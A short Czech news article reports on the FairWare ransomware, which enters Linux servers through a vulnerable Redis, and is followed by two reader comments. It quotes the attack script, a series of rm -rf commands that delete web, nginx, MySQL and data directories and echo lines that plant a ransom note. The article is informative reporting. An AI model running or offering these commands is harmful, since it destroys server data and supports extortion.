Hlavní navigace

Nový ransomware FairWare napadá linuxové servery přes Redis

Sdílet

Jan Fikar 1. 9. 2016

Nový ransomware FairWare napadá linuxové servery přes zranitelný Redis. Poté smaže obsah webového serveru a zanechá zprávu, ve které požaduje výkupné 2 bitcoiny. Nezdá se, že by cokoliv šifroval. Spíše jde o jednoduchý skript:

rm -rf /var/www/
rm -rf /usr/share/nginx
rm -rf /var/lib/mysql/
rm -rf /data/
echo "Hi, please view: http://termbin.com/um7t for further information in regards to your files" > /root/READ_TO_DECRYPT
echo "Hi, please view: http://termbin.com/um7t for further information in regards to your file!" > /etc/motd

FairWare není prvním ransomware na Linuxu, už jsme tu loni měli Linux.Encoder.

Našli jste v článku chybu?
  • Aktualita je stará, nové názory již nelze přidávat.
  • 1. 9. 2016 12:02

    Sadam (neregistrovaný) 188.175.128.---

    Podarilo se nekomu zjistit pres co presne se tam dostali ? Rad bych vedel co mam zkontrolovat u svych instalaci Redisu ...
    Takhle je to info k nicemu...

  • 1. 9. 2016 12:49

    Tany (neregistrovaný) ---.215.broadband10.iol.cz

    Takže nadpis článku by měl být: Script maže docroot pitomcům, kteří se s*rou do správy serveru a chce po nich dva bitcoiny.